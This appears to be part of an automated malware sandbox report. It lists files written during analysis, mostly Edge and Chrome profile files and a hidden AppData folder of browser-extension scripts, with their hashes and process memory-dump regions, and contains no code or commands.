MD5 a44730a821e1b97724f134595ebf425c
SHA1 c1c0681b3fe825727ab8e3b89e85f4409ec1db58
SHA256 659f24408fe7a00d1defac879ee821cca25d1a3c9deaf005068a5218fb0df06f
SHA512 01f61c18736a0771b5ced7503992ef28d958de4cbebbc80320d9e328150f1eef6bcad68e8b07109d7dad31b5c62996927d10eb2fd88228541fbae0e10a5ae378

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b468db5721c9bea3ee62e6641a2eec9b
SHA1 5d8673c8bdf1aab4b28a410ccfb04f2bf133bbb8
SHA256 487e159403d5c227f56695fa7c9bfc27ff80a1dddea9418545a31c143aeae817
SHA512 d0da6e8aa970d72999c6d975935be30cd3a3e037bf7a90a6ff6df6dd3ca57a6f75eef74c6e5a8214848bdd1a403ca9a75a6f0b8a4beabedd15600f50f3dfff8e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ba5d56d8b9a3b54c5a9a571add32417c
SHA1 520a619fd900ae9da8c02e607b9b7a2fe5946f68
SHA256 5f688ed7c8e15d6d5fc5688fe7da7203540f764e1f1e49114120a95e6778a162
SHA512 203c75db65641c8677253b74f8d38ce9e43b68ad49786f6bacd621730bc5c6925afd008abb6a91d6ea6e3df79635dbe4554fa0db0cf818121363739184acf474

memory/2288-981-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-983-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-982-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-984-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-985-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-986-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-987-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-988-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-989-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-990-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-991-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-992-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-993-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-996-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-997-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-998-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-999-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1000-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp

memory/2288-1001-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 7c2a94bd1042529c7c4436640fff94b7
SHA1 df542e78e77a92e7c69c95f2f1ad6420591ef291
SHA256 b8929be8a20b0b736aa2bf01910526c6007b3568ed8be63a11b4b008e090bcd1
SHA512 2034043a27b4b8984dec729be8d5e66c926e5163aac4addc0182725b49fce0c495b8e08682940f566512f71617a438e208434208e184a84524f2c7549725e22f

memory/2288-1036-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1037-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1043-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-1044-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-1045-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-1046-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-1047-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1048-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1050-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1049-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 7202441009a21953c73a0e5c8587bd99
SHA1 20593b74ebc6d3bff82df44accbc850983204786
SHA256 78a2f852fa9bfdad524669a4e6125ea21ef69a7f33c7a48c609f557d7d77b54e
SHA512 09f2d053afb4c1c20150ab294de8e6969c7f189320e81d20e356ada83fb980369409f80ca70f9e0d61cceb68fbe73b34b45a6acb14c9328ff99e6866a30d03b2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 c848ef6c8649b0cdb8c61b7655b56e03
SHA1 9c6636c4c1671521fd63e1a2ff14bbec66892f3f
SHA256 26f83bdbd9fa4decdc73250ab788cf429a207a3d94d5cf1af5372018d1978153
SHA512 f0ae75728c472d2bc8657cd7b3294fcf2b7c413a28c60fddd44c01716f0cd87ecc26d4062ee10c14dd733ab90ae3d93021f5c6d455b86f7d01fc3c98f6f5d022

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 dae7ce8122789a22f1341632928523ec
SHA1 6d556c6623cb9ec19943c16dc8e9c885dec72285
SHA256 b6bcaa99e58edc1c3ef5157118e79ef12ae14b18470f0952dc9320f8a0a7a852
SHA512 414257d4effbb50625412204f30715aaaf829c2b913857a4e2bd591b83b88db7c4b8b80ef84ff1e1ac611e3b051e3a66bbe944aca52e147d4f5a2ce3eeb3ccab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 848cdcb690e2d3ebef461807ffd02d5c
SHA1 9d55e5bbb00b0f8c7100f0c07dc471029c89e7a4
SHA256 238ab7590e50c4122696846333f14fb2ebb8b147f12247207f5369d09715c5f9
SHA512 0996431d5a3da2b799f34afe73716b89a7ca37dfd2d22ec5d5d994d3fbc3cbb79c5325097da1dab9764c7bde70773fe1c795f419d7e6bc8e2fbbf7bf42834a23

memory/1640-1090-0x000000006B480000-0x000000006B4C1000-memory.dmp

memory/1640-1089-0x0000000065A80000-0x0000000065AAA000-memory.dmp

memory/1640-1091-0x000000006A800000-0x000000006A80F000-memory.dmp

memory/4912-1098-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/4912-1100-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/4016-1099-0x0000000065A80000-0x0000000065AAA000-memory.dmp

memory/4016-1097-0x0000000000400000-0x000000000054C000-memory.dmp

memory/4016-1101-0x000000006B480000-0x000000006B4C1000-memory.dmp

memory/4016-1102-0x000000006A800000-0x000000006A80F000-memory.dmp

memory/4912-1103-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/4016-1105-0x0000000063080000-0x00000000630A9000-memory.dmp

memory/2496-1113-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/2496-1114-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/2496-1115-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/3700-1116-0x0000000000400000-0x000000000054C000-memory.dmp

memory/3700-1118-0x000000006B480000-0x000000006B4C1000-memory.dmp

memory/4212-1122-0x00007FF89F8C0000-0x00007FF8A0381000-memory.dmp

memory/4212-1123-0x0000019FEE260000-0x0000019FEE270000-memory.dmp

memory/4212-1124-0x0000019FEE260000-0x0000019FEE270000-memory.dmp

memory/4212-1135-0x0000019FEE260000-0x0000019FEE270000-memory.dmp

memory/3456-1153-0x00000000000E0000-0x0000000000108000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5j8DxCjO4h6M7cc..dat

MD5 bc8c2ebedf8f83ad188ed263f1cd3375
SHA1 abc42cabb39db3cb6f4d6e526b2bd01fc99d58be
SHA256 cd454c9fca4756a4e896a12686877ea8331928b7b9c2beba233df72426b9b7fa
SHA512 21216157309e04e3690b89914a0d22786f18f9f36a6d841bbca9328d58dd0a8804056e9beb9f462ddffe8114231b831eb46e26268920aeb94979cf3a226c70c5

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\rules.json

MD5 6c96a8e0dc7f99afebd022054a96bff5
SHA1 836c9f51bbbc8e5dc096cee29d7354b3a2211de1
SHA256 464f3f4c07331ae1f15fe0e6a209b4cfaf8cfce14a7c79eb192cbf2c49bbcb19
SHA512 ebad39459aead9cac1d3d1bd27459de20f107a19c3492678b869d8488e014fb2fba168c7a0d98cfb7742a4052e20ba526bef29aa63cf79f923dbdb926c87469d

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\modules\content-scripts-register-polyfill.4.0.0.js

MD5 e2cdab6fd36bc5e771aa9e4ee2792ce4
SHA1 fd3fee7dc43c59636c8663a38cdef6ed1ccc6a25
SHA256 9d1c97a6c1bf526de3f65a54f691d2540ca1dd300ed038f1df41f5fbd9ed2730
SHA512 e9741d3753f8483d033f00a4041d0d248b8013746d023ab31edeb649faf8f14a55e49a582fce1b0fa13866fc6d50917df683e3aca211d56b8e9855e7a93038fb

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\commands.js

MD5 356e0d12f629ea365f915f4601251524
SHA1 32abd4c94b877d2e4e68199c589fc9c5d96efabb
SHA256 185096fa1cda20813b58cae34659717e79fbd8bd8b89c95c9a93e3ca68efa2a1
SHA512 5b742841924421fc32dc0206d40a011546fa29629077ee6df644d9c3aa2fe36bc01d4ad1a939b1a79d4b5ec6d82cdcd5b157ad4a438e34db7ba99eaedced9d68

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\extensions.js

MD5 cab74f7fb79c1921db62ffcbf2a43041
SHA1 03d69ccbe480d09a94cbe394d9d5befcc68133ba
SHA256 c4fe0a069bcc13d3f783deb92e3adab1053c5d99407547f1fcbe39c7f342af39
SHA512 044754865af6950bf7b534e74d608bb47df3a537904f89e61bc4c2c03860de45786504e2fdebb4d4ef356c8ba078ce1fb185d4beb1fde1407c41511bdb07cc76

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\exchangeSettings.js

MD5 055b125ec5b05895873435e423eca4f1
SHA1 811c2f93b1b3644952c2a6eab8ef9dd8c9605edf
SHA256 2c9084f1d82aae713607e72e6f7825076328a9f3dfaa6ad89d7d069235a95e7c
SHA512 ab99affad8a6f4762dc5ee2b906f7c2d4a0cfb448a095026d0039b74355b3a8303aafd97d1674fce2ef8db121a4beac134e356f86237ca45f14b155c5f5bdebe

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\app.html

MD5 a10ca2219a68335cf253395574f7d285
SHA1 a7111f1292518214ff4bf0920432c72c978c5b65
SHA256 e9b3c0b944e83cedb78440a99cb793fdf32fa6ea8c36fb89c638de75f3af602c
SHA512 61a1c7905dc6077fb2bc55296c7d477ca8fbf5e0763633356fdb32844f128313e629bb7c0f7081939b75eb5c452b8480e60b36eb88ca2477b5abd9b5eb4ccbe7

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\utils.js

MD5 86eaae8138cf039c05e0be5dc807d9f1
SHA1 6a43f5227be21c2a3a2526cd3dd6a6e10425ea04
SHA256 0f2b72153f263cfd7c2e5640d2362a1731253070c408d278ded46bb762e50f14
SHA512 686e7090d10c35c404c510214a31d80a2ac041f6db2cb94d8f6f5ae47c146fb18eab96573c33e1d5ca4dfc21ac70abe94b4412d6b9621de9a9d01d85229acf99

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 31af3e895896b8bc25db0004afa3bb1f
SHA1 bb8ce8e9e725f76a2d64d21afdfb287b4a74c11a
SHA256 142c5c4cfeb0b968fe312d89282b0d4979225b3285bfc1ba2fd5897d3487180c
SHA512 ea7e780c2e8a42780c4dc19eb182dc8542f5b34047589a720c7b3fc4fdb76a992b3722d105f3ff617e0ede9ce37e7db3bc261081ff7b46d9924d96bfbd41756c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 ffb219f47d2339fd257b6bef93dd11e9
SHA1 2efcfc93f9609a88e861126d84cfd59b2b318254
SHA256 33ca89491898d6236f025c6e890a64a161a6ea7802d6ffd063926e3174d4c750
SHA512 0e412a272fe86346a9a6489c703f36c2c658b4f1bafce072ac43aaeb3d5b33b05230599b6a8e8baebed519413dad7dcbe0e0ad8b13904a06c80c256b6aba1bba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c0aa56b55ea267df672bd20da3afe198
SHA1 a823036510dd563efd962a810897a45d78ca4b9c
SHA256 b8ed7d1bb5afd384da5db05fb8f369fc618f0f40b0966f64c3ade80049c41d22
SHA512 ea66ecc5a1b3492fa8f96d8f42209d803c9e14539451a06d2727e99b81a403dbdb5df94e4407a5508ebe3217a4b7afdab2958ebf39efe58558cd8769034e5352

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a421394116d7192e61e44dcca8be2b1f
SHA1 277706740e054511b9f9566046eeb3e5a92176b4
SHA256 2b9a05993ff2bc5552e8270759112d3ca61c1e34d7fc19654eab4075e854441b
SHA512 a6e988c4aa12f8c96a5039c24d996ed2f8efdf612fe77de5e2fca63d3a1436dcca31b7d14d9fb6fe3face43e70bca8cd797a96f2bdd404872eb43d7593743562

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b6a2107c0bf35a9c542f6ea337939a4d
SHA1 0e5015bcd2c1bbac0790696a6af69724a9fe218d
SHA256 d1ed1a71ff94d7d2ebe02bd87ea2b439d25552a2fea59c142b081a80f910aed6
SHA512 8906be1e7432f5aaab05a4bffe85460c6e6fec7b6052d1c3060de40370380bf0e236a10a7cdd3c3ed3724dd203a348ad372769a6b7ffcba58513bcbbd221c9c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e66048e11418e28153d4a508e6e3ebda
SHA1 f819e21c18516b257b4a62fe218a5edf6e067f8e
SHA256 c3f7902a1f34e0611e2b9e10d9804128e994b6f995b41c68aa261dc22c47bc43
SHA512 dcebea62a05bde4373982ceb6edbcafa23da187009f7949b47846749f23d5d4440d73c595e8f04044fb2ed5b1bee342759bd23e5415a35a58f439f8d692749e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 8c24bba1a11e3cb4000b3b8f15d82a66
SHA1 bb59e3574b1b0f497206eb37ffc7d9138b198200
SHA256 f2727a0d42fabb6cd86e1cdcf2f299afc43595a1f6804d957be87a5bf4cd65ca
SHA512 b95f111b5b99647b3e3555a34de9fd3c6b8bbd795a646ca5b3948563b990daf041fb78fa1865dd8f5f99b85e423ccf07e8c5911f863ccdab03c88883aa256fed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b0359595-04a9-467f-b06d-95c7ede11ec8.dmp

MD5 295e9b37bc3a8699ac9d5d50d89b73d9
SHA1 6e7671d80e81ad68a6f7ee56420ac9f076c162fe
SHA256 0088fcda612d3fbeeb1ed813669f96e9822243458d247c67238f7c20be5f403d
SHA512 e3a9f309b0da9f3e91cad263d9ea4d0df049ffcfdd40852c0a161e6186b6a11dc6938ac9c9fbbf14ba5f9b3a5e3721e0af763750e0655e5a254b2251bfb08733

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0b821d41f9230f6d01e4fbf49a7c2937
SHA1 a4fe181bdeeb0e7a97813c1c4d604deb1ccb6f31
SHA256 867eeb0668835879b2f2e99c4fc20c9318ffab5c82f091712efcd76f6f94cd00
SHA512 85ea8b5667a18ab703f14a9fb63faf3160b8419b5f7e5f1d479d7666f4558f4cd7dcf4da6a36965daa45f5f3486dbdc06ec0e34b3a0c765855ff309f53595d5e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6e8402929329a1948373d43b96ae3b0f
SHA1 a46eb3c12614ff4b850bf8cf4d492f596b8a207a
SHA256 da4ea854907f1c8c8e655d7f3d7c19511fbbaf8fb6bba92471ba8962f10326a2
SHA512 e760d2820af6d4de29654cea592d8ff6f033482e2aa5b888ed45233ff30d01e38db8d9d074abd0c5e449270abfaf284db5752160891c0f2892142b261ac503ce

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8d3aec1158b16a4b346a5b1f9edce498
SHA1 b186c54befa103b3982e4b655d1fe781a1b277b5
SHA256 859c7fc1d6735cec0d3b8b620199f3b63181bf5c28f89c4f0acd05e4ba3c919b
SHA512 40089f514147b0374e11ca4704126e42a1359fc01d35d6de0536a60cda1d9ad325d7b62c34fdc7966067252302ad3e062f05788adddeb354d4f76b0e46d81674

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 7bc5657e8c1e87a70e4c31e84f6b10eb
SHA1 6888bc8a52b514fd8ea71a5fa8590fc245420e98
SHA256 734057e66f81b40992c1ffa55670b33e0d1288e36af53cc65d45066883987d60
SHA512 e59c2dc55624e1f1e43fd0a50b355a1863a0d5bc366cb00935eb2f080bf3d7096676d99d6c1bcd542ce6d26bceaf8bb0c921f73c23442babb3bc3bc38fb50a99

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

MD5 f26372955c1344efee1686dd10fac4c5
SHA1 6a0e58444e9f9be90588c397b37a438db2bed294
SHA256 b9b110e6e85ffabf8440785d4ac0e0924ec577be3edf1ba7d6fe466039e88cb8
SHA512 706dc8267bc04acf6da06e93cdbdcc84b4ff56df4327c849472a73666a6dca113d8236dcc79c1bccc5b05d1ff8619c79e1334cfe159f3cf8be4f7cd082cfdb30

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000016

MD5 757d6eefadad52434d858027028b5a5a
SHA1 baa970f53eccf09e806f4d12840bd0dd172285a5
SHA256 ee5d5dc43d17b5c0e6871674128062560cf846a4cde2752bfdf91214bae301dc
SHA512 ac09cfb97c3bf28b0cac425490ee0d263832946cfea99a13cccb7da5a586ba15ed0f6fbfe0bd7d9ec983b8b2717aa0e15abaa27239caca25fcebe840cb6555d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ea2073edde46f27e79fd05eea3f52e3a
SHA1 ddafdcf9cff8f7c5ac2b03ad62a79ee3d9ba0cef
SHA256 0d00aead436b1f8d6900964132eb475ba8e896d95d572d0f6d53c8d5993a837b
SHA512 ffcf6c400eff528f05c88fc2a3568e44da6317bfe54971f0ab968a8771019536d721cb3301120c8230a2291c9c7deffa1e8fb964dedc0f8cbcb3b81b98f1cfb2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 0ebf781469919430d17e3bc895a151d6
SHA1 843540b5130b87996b1f8df08a1fa693269937be
SHA256 ee7272ef1e09b2c9fcfe4a88a35468977c8c7c6048b13bc292f0f70350ca15b6
SHA512 1e398c25e01a43757f902a37a5342c99e73865a22f21a2feb62f6ce2d6eb6def14672a386f61537c9779d26fa6af4cc06478d042301303aea6c9cb0faeb83ea5